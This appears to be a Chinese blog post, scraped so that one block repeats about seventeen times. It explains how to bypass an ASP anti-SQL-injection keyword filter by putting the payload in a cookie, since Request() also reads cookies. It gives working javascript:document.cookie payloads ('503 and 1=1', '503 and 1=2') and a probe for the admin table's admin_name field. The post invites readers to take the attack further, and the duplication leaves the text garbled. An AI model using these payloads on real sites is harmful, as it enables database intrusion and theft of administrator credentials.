  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44591) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44590) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44589) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44588) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44587) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44586) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44585) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44584) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44583) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44582) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44581) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44580) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44579) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44578) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44577) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44576) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
